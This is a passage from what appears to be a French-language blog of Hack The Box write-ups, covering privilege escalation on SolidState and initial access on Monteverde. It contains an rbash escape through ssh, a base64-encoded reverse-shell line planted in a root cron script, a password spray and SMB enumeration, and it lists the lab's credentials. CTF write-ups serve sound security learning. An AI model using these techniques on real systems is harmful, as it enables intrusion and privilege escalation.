class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">mindy@solidstate:~$ ls </span></span><span class="line"><span class="cl">bin user.txt </span></span><span class="line"><span class="cl">mindy@solidstate:~$ <span class="nb">cd</span> .. </span></span><span class="line"><span class="cl">-rbash: cd: restricted </span></span><span class="line"><span class="cl">mindy@solidstate:~$ /bin/ls </span></span><span class="line"><span class="cl">-rbash: /bin/ls: restricted: cannot specify <span class="sb">`</span>/<span class="err">&#39;</span> in <span class="nb">command</span> names </span></span></code></pre></td></tr></table> </div> </div><p>Mais grâce à ssh, on peut préciser une commande à executer au lancement. Par exemple, lui demander de lancer un bash, ce qui permet de bypasser le lancement du restricted bash !</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ ssh mindy@10.10.10.51 bash </span></span><span class="line"><span class="cl">mindy@10.10.10.51<span class="s1">&#39;s password: </span></span></span><span class="line"><span class="cl"><span class="s1">ls </span></span></span><span class="line"><span class="cl"><span class="s1">bin </span></span></span><span class="line"><span class="cl"><span class="s1">user.txt </span></span></span><span class="line"><span class="cl"><span class="s1">cd .. </span></span></span><span class="line"><span class="cl"><span class="s1">ls </span></span></span><span class="line"><span class="cl"><span class="s1">james </span></span></span><span class="line"><span class="cl"><span class="s1">mindy </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">---------------------- </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">$ ssh mindy@10.10.10.51 -t &#34;bash --noprofile&#34; </span></span></span><span class="line"><span class="cl"><span class="s1">mindy@10.10.10.51&#39;</span>s password: </span></span><span class="line"><span class="cl"><span class="si">${</span><span class="nv">debian_chroot</span><span class="p">:+(</span><span class="nv">$debian_chroot</span><span class="p">)</span><span class="si">}</span>mindy@solidstate:~$ ls </span></span><span class="line"><span class="cl">bin user.txt </span></span><span class="line"><span class="cl"><span class="si">${</span><span class="nv">debian_chroot</span><span class="p">:+(</span><span class="nv">$debian_chroot</span><span class="p">)</span><span class="si">}</span>mindy@solidstate:~$ <span class="nb">cd</span> .. </span></span><span class="line"><span class="cl"><span class="si">${</span><span class="nv">debian_chroot</span><span class="p">:+(</span><span class="nv">$debian_chroot</span><span class="p">)</span><span class="si">}</span>mindy@solidstate:/home$ ls </span></span><span class="line"><span class="cl">james mindy </span></span><span class="line"><span class="cl"><span class="si">${</span><span class="nv">debian_chroot</span><span class="p">:+(</span><span class="nv">$debian_chroot</span><span class="p">)</span><span class="si">}</span>mindy@solidstate:/home$ <span class="nb">exit</span> </span></span><span class="line"><span class="cl">Connection to 10.10.10.51 closed. </span></span></code></pre></td></tr></table> </div> </div><h3 id="root-file--opttmppy">root file : /opt/tmp.py </h3><p>A l&rsquo;aide <strong>linpeas</strong> et/ou <strong>linenum</strong>, on découvre un fichier /opt/tmp.py qui semble vider le dossier /tmp en utilisant os.system(). Les droits du fichier sont 777 (rwxrwxrwx). Le fichier appartient à root mais est modifiable par n&rsquo;importe qui, dont <strong>mindy</strong>. J&rsquo;ai donc essayer de mettre une commande pour faire un reverse shell. Au vu de ce que fait ce script, on peut déduire qu&rsquo;il doit etre executé dans une cronjob probablement en tant que root.</p> <p>Après quelques minutes, je reçois bien un shell en tant que root sur la machine, ce qui prouve notre théorie :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="si">${</span><span class="nv">debian_chroot</span><span class="p">:+(</span><span class="nv">$debian_chroot</span><span class="p">)</span><span class="si">}</span>mindy@solidstate:/opt$ cat tmp.py </span></span><span class="line"><span class="cl"><span class="c1">##!/usr/bin/env python</span> </span></span><span class="line"><span class="cl">import os </span></span><span class="line"><span class="cl">import sys </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Reverse shell</span> </span></span><span class="line"><span class="cl">os.system<span class="o">(</span><span class="s1">&#39;echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi44LzkwMDEgMD4mMQ== | base64 -d | bash&#39;</span><span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Code initial du script</span> </span></span><span class="line"><span class="cl">try: </span></span><span class="line"><span class="cl"> os.system<span class="o">(</span><span class="s1">&#39;rm -r /tmp/* &#39;</span><span class="o">)</span> </span></span><span class="line"><span class="cl">except: </span></span><span class="line"><span class="cl"> sys.exit<span class="o">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-------------------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nc -lnvp <span class="m">9001</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::9001 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:9001 </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.51. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.51:58410. </span></span><span class="line"><span class="cl">bash: cannot <span class="nb">set</span> terminal process group <span class="o">(</span>31712<span class="o">)</span>: Inappropriate ioctl <span class="k">for</span> device </span></span><span class="line"><span class="cl">bash: no job control in this shell </span></span><span class="line"><span class="cl">root@solidstate:~# whoami </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl">root@solidstate:~# cat /root/root.txt </span></span><span class="line"><span class="cl">cat /root/root.txt </span></span><span class="line"><span class="cl">0574.....d2b9 </span></span></code></pre></td></tr></table> </div> </div><h2 id="tips">Tips </h2><ul> <li>TOUJOURS bien regarder en détail l&rsquo;execution de linpeas ou de linenum. Parfois, on peut rater des fichiers/binaires, qui ne sont pas habituels. Par exemple ici, on avait /opt/tmp.py qui aurait du me sauter aux yeux. Ces fichiers ne sont pas forcément surlignés en rouge&hellip;</li> </ul>HTB | Monteverdehttps://leopoldabgn.github.io/writeups/p/monteverde-htb/Sun, 20 Jul 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/monteverde-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Monteverde cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Monteverde</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.172</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">SABatchJobs:SABatchJobs </span></span><span class="line"><span class="cl">mhope:4n0therD4y@n0th3r$ </span></span><span class="line"><span class="cl">administrator:d0m@in4dminyeah! </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.172 </span></span><span class="line"><span class="cl">Starting Nmap 7.93 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2025-07-17 23:38 CEST </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">53/tcp open domain syn-ack ttl <span class="m">127</span> Simple DNS Plus </span></span><span class="line"><span class="cl">88/tcp open kerberos-sec syn-ack ttl <span class="m">127</span> Microsoft Windows Kerberos <span class="o">(</span>server time: 2025-07-17 21:39:43Z<span class="o">)</span> </span></span><span class="line"><span class="cl">135/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">139/tcp open netbios-ssn syn-ack ttl <span class="m">127</span> Microsoft Windows netbios-ssn </span></span><span class="line"><span class="cl">389/tcp open ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl">445/tcp open microsoft-ds? syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">464/tcp open kpasswd5? syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">593/tcp open ncacn_http syn-ack ttl <span class="m">127</span> Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">636/tcp open tcpwrapped syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">3268/tcp open ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl">3269/tcp open tcpwrapped syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">5985/tcp open http syn-ack ttl <span class="m">127</span> Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Not Found </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Microsoft-HTTPAPI/2.0 </span></span><span class="line"><span class="cl">9389/tcp open mc-nmf syn-ack ttl <span class="m">127</span> .NET Message Framing </span></span><span class="line"><span class="cl">49667/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49673/tcp open ncacn_http syn-ack ttl <span class="m">127</span> Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">49674/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49676/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49696/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49750/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">Warning: OSScan results may be unreliable because we could not find at least <span class="m">1</span> open and <span class="m">1</span> closed port </span></span><span class="line"><span class="cl">OS fingerprint not ideal because: Missing a closed TCP port so results incomplete </span></span><span class="line"><span class="cl">No OS matches <span class="k">for</span> host </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="getting-users-using-nxc">Getting users using nxc </h3><p>Avec <code>nxc smb</code> et l&rsquo;utilisateur anonyme on récupère une liste d&rsquo;utilisateurs.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nxc smb 10.10.10.172 -u <span class="s1">&#39;&#39;</span> -p <span class="s1">&#39;&#39;</span> --users <span class="p">|</span> tr -s <span class="s1">&#39; &#39;</span> <span class="p">|</span> cut -d <span class="s1">&#39; &#39;</span> -f <span class="m">5</span> <span class="p">|</span> head -n13 <span class="p">|</span> tail -n <span class="m">10</span> <span class="p">|</span> tee users.txt </span></span><span class="line"><span class="cl">Guest </span></span><span class="line"><span class="cl">AAD_987d7f2f57d2 </span></span><span class="line"><span class="cl">mhope </span></span><span class="line"><span class="cl">SABatchJobs </span></span><span class="line"><span class="cl">svc-ata </span></span><span class="line"><span class="cl">svc-bexec </span></span><span class="line"><span class="cl">svc-netapp </span></span><span class="line"><span class="cl">dgalanos </span></span><span class="line"><span class="cl">roleary </span></span><span class="line"><span class="cl">smorgan </span></span></code></pre></td></tr></table> </div> </div><h3 id="password-spray">Password Spray </h3><p>On tente un <strong>password spray</strong> avec &ldquo;user == password&rdquo; et on découvre les identifiants suivants:</p> <ul> <li><code>SABatchJobs:SABatchJobs</code></li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nxc smb 10.10.10.172 -u users.txt -p users.txt --continue-on-success --no-bruteforce </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:MONTEVERDE<span class="o">)</span> <span class="o">(</span>domain:MEGABANK.LOCAL<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>-<span class="o">]</span> MEGABANK.LOCAL<span class="se">\G</span>uest:Guest STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>-<span class="o">]</span> MEGABANK.LOCAL<span class="se">\A</span>AD_987d7f2f57d2:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>-<span class="o">]</span> MEGABANK.LOCAL<span class="se">\m</span>hope:mhope STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>+<span class="o">]</span> MEGABANK.LOCAL<span class="se">\S</span>ABatchJobs:SABatchJobs </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>-<span class="o">]</span> MEGABANK.LOCAL<span class="se">\s</span>vc-ata:svc-ata STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>-<span class="o">]</span> MEGABANK.LOCAL<span class="se">\s</span>vc-bexec:svc-bexec STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>-<span class="o">]</span> MEGABANK.LOCAL<span class="se">\s</span>vc-netapp:svc-netapp STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>-<span class="o">]</span> MEGABANK.LOCAL<span class="se">\d</span>galanos:dgalanos STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>-<span class="o">]</span> MEGABANK.LOCAL<span class="se">\r</span>oleary:roleary STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>-<span class="o">]</span> MEGABANK.LOCAL<span class="se">\s</span>morgan:smorgan STATUS_LOGON_FAILURE </span></span></code></pre></td></tr></table> </div> </div><h3 id="user-and-azure_uploads-smb-shares--read-access">&lsquo;user$&rsquo; and &lsquo;azure_uploads&rsquo; smb shares : READ ACCESS </h3><p>Avec smbmap on trouve le share &lsquo;user$&rsquo; et &lsquo;azure_uploads&rsquo; accessibles en lecture :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">smbmap -H <span class="s2">&#34;10.10.10.172&#34;</span> -u SABatchJobs -p SABatchJobs </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> ________ ___ ___ _______ ___ ___ __ _______ </span></span><span class="line"><span class="cl"> /<span class="s2">&#34; )|&#34;</span> <span class="se">\ </span>/<span class="s2">&#34; || _ &#34;</span><span class="se">\ </span><span class="p">|</span><span class="s2">&#34; \ /&#34;</span> <span class="p">|</span> /<span class="s2">&#34;&#34;</span><span class="se">\ </span> <span class="p">|</span> __ <span class="s2">&#34;\ </span></span></span><span class="line"><span class="cl"><span class="s2"> (: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :) </span></span></span><span class="line"><span class="cl"><span class="s2"> \___ \ /\ \/. ||: \/ /\ \/. | /&#39; /\ \ |: ____/ </span></span></span><span class="line"><span class="cl"><span class="s2"> __/ \ |: \. |(| _ \ |: \. | // __&#39; \ (| / </span></span></span><span class="line"><span class="cl"><span class="s2"> /&#34;</span> <span class="se">\ </span> :<span class="o">)</span> <span class="p">|</span>. <span class="se">\ </span>/: <span class="o">||</span>: <span class="p">|</span>_<span class="o">)</span> :<span class="o">)</span><span class="p">|</span>. <span class="se">\ </span>/: <span class="p">|</span> / / <span class="se">\ </span> <span class="se">\ </span> /<span class="p">|</span>__/ <span class="se">\ </span></span></span><span class="line"><span class="cl"> <span class="o">(</span>_______/ <span class="p">|</span>___<span class="p">|</span><span class="se">\_</span>_/<span class="p">|</span>___<span class="p">|</span><span class="o">(</span>_______/ <span class="p">|</span>___<span class="p">|</span><span class="se">\_</span>_/<span class="p">|</span>___<span class="p">|</span><span class="o">(</span>___/ <span class="se">\_</span>__<span class="o">)(</span>_______<span class="o">)</span> </span></span><span class="line"><span class="cl">----------------------------------------------------------------------------- </span></span><span class="line"><span class="cl">SMBMap - Samba Share Enumerator v1.10.7 <span class="p">|</span> Shawn Evans - ShawnDEvans@gmail.com </span></span><span class="line"><span class="cl"> https://github.com/ShawnDEvans/smbmap </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Detected <span class="m">1</span> hosts serving SMB </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Established <span class="m">1</span> SMB connections<span class="o">(</span>s<span class="o">)</span> and <span class="m">1</span> authenticated session<span class="o">(</span>s<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> IP: 10.10.10.172:445 Name: MEGABANK.LOCAL Status: Authenticated </span></span><span class="line"><span class="cl"> Disk Permissions Comment </span></span><span class="line"><span class="cl"> ---- ----------- ------- </span></span><span class="line"><span class="cl"> ADMIN$ NO ACCESS Remote Admin </span></span><span class="line"><span class="cl"> azure_uploads READ ONLY </span></span><span class="line"><span class="cl"> C$ NO ACCESS Default share </span></span><span class="line"><span class="cl"> E$ NO ACCESS Default share </span></span><span class="line"><span class="cl"> IPC$ READ ONLY Remote IPC </span></span><span class="line"><span class="cl"> NETLOGON READ ONLY Logon server share </span></span><span class="line"><span class="cl"> SYSVOL READ ONLY Logon server share </span></span><span class="line"><span class="cl"> users$ READ ONLY </span></span></code></pre></td></tr></table> </div> </div><p>On remarque que azure_uploads est vide.</p> <p>Dans users$ on trouve le dossier d&rsquo;un autre utilisateur &ldquo;<strong>mhope</strong>&rdquo; avec un fichier <code>azure.xml</code> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ smbclient //10.10.10.172/users$ -U MEGABANK.LOCAL/SABatchJobs </span></span><span class="line"><span class="cl">Password <span class="k">for</span> <span class="o">[</span>MEGABANK.LOCAL<span class="se">\S</span>ABatchJobs<span class="o">]</span>: </span></span><span class="line"><span class="cl">Try <span class="s2">&#34;help&#34;</span> to get a list of possible commands. </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> ls </span></span><span class="line"><span class="cl"> . D <span class="m">0</span> Fri Jan <span class="m">3</span> 14:12:48 <span class="m">2020</span> </span></span><span class="line"><span class="cl"> .. D <span class="m">0</span> Fri Jan <span class="m">3</span> 14:12:48 <span class="m">2020</span> </span></span><span class="line"><span class="cl"> dgalanos D <span class="m">0</span> Fri Jan <span class="m">3</span> 14:12:30 <span class="m">2020</span> </span></span><span class="line"><span class="cl"> mhope D <span class="m">0</span> Fri Jan <span class="m">3</span> 14:41:18 <span class="m">2020</span> </span></span><span class="line"><span class="cl"> roleary D <span class="m">0</span> Fri Jan <span class="m">3</span> 14:10:30 <span class="m">2020</span> </span></span><span class="line"><span class="cl"> smorgan D <span class="m">0</span> Fri Jan <span class="m">3</span> 14:10:24 <span class="m">2020</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="m">31999</span> blocks of size 4096. <span class="m">28979</span> blocks available </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> <span class="nb">cd</span> mhope </span></span><span class="line"><span class="cl">smb: <span class="se">\m</span>hope<span class="se">\&gt;</span> ls </span></span><span class="line"><span class="cl"> . D <span class="m">0</span> Fri Jan <span class="m">3</span> 14:41:18 <span class="m">2020</span> </span></span><span class="line"><span class="cl"> .. D <span class="m">0</span> Fri Jan <span class="m">3</span> 14:41:18 <span class="m">2020</span> </span></span><span class="line"><span class="cl"> azure.xml AR <span class="m">1212</span> Fri Jan <span class="m">3</span> 14:40:23 <span class="m">2020</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="m">31999</span> blocks of size 4096. <span class="m">28979</span> blocks available </span></span><span class="line"><span class="cl">smb: <span class="se">\m</span>hope<span class="se">\&gt;</span> get azure.xml </span></span><span class="line"><span class="cl">getting file <span class="se">\m</span>hope<span class="se">\a</span>zure.xml of size <span class="m">1212</span> as azure.xml <span class="o">(</span>15.0 KiloBytes/sec<span class="o">)</span> <span class="o">(</span>average 15.0 KiloBytes/sec<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><p>Dans ce fichier se trouve un mot de passe <code>4n0therD4y@n0th3r$</code>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">cat azure.xml </span></span><span class="line"><span class="cl">��&lt;Objs <span class="nv">Version</span><span class="o">=</span><span class="s2">&#34;1.1.0.1&#34;</span> <span class="nv">xmlns</span><span class="o">=</span><span class="s2">&#34;http://schemas.microsoft.com/powershell/2004/04&#34;</span>&gt; </span></span><span class="line"><span class="cl"> &lt;Obj <span class="nv">RefId</span><span class="o">=</span><span class="s2">&#34;0&#34;</span>&gt; </span></span><span class="line"><span class="cl"> &lt;TN <span class="nv">RefId</span><span class="o">=</span><span class="s2">&#34;0&#34;</span>&gt; </span></span><span class="line"><span class="cl"> &lt;T&gt;Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential&lt;/T&gt; </span></span><span class="line"><span class="cl"> &lt;T&gt;System.Object&lt;/T&gt; </span></span><span class="line"><span class="cl"> &lt;/TN&gt; </span></span><span class="line"><span class="cl"> &lt;ToString&gt;Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential&lt;/ToString&gt; </span></span><span class="line"><span class="cl"> &lt;Props&gt; </span></span><span class="line"><span class="cl"> &lt;DT <span class="nv">N</span><span class="o">=</span><span class="s2">&#34;StartDate&#34;</span>&gt;2020-01-03T05:35:00.7562298-08:00&lt;/DT&gt; </span></span><span class="line"><span class="cl"> &lt;DT <span class="nv">N</span><span class="o">=</span><span class="s2">&#34;EndDate&#34;</span>&gt;2054-01-03T05:35:00.7562298-08:00&lt;/DT&gt; </span></span><span class="line"><span class="cl"> &lt;G <span class="nv">N</span><span class="o">=</span><span class="s2">&#34;KeyId&#34;</span>&gt;00000000-0000-0000-0000-000000000000&lt;/G&gt; </span></span><span class="line"><span class="cl"> &lt;S <span class="nv">N</span><span class="o">=</span><span class="s2">&#34;Password&#34;</span>&gt;4n0therD4y@n0th3r$&lt;/S&gt; </span></span><span class="line"><span class="cl"> &lt;/Props&gt; </span></span><span class="line"><span class="cl"> &lt;/Obj&gt; </span></span><span class="line"><span class="cl">&lt;/Objs&gt;# </span></span></code></pre></td></tr></table> </div> 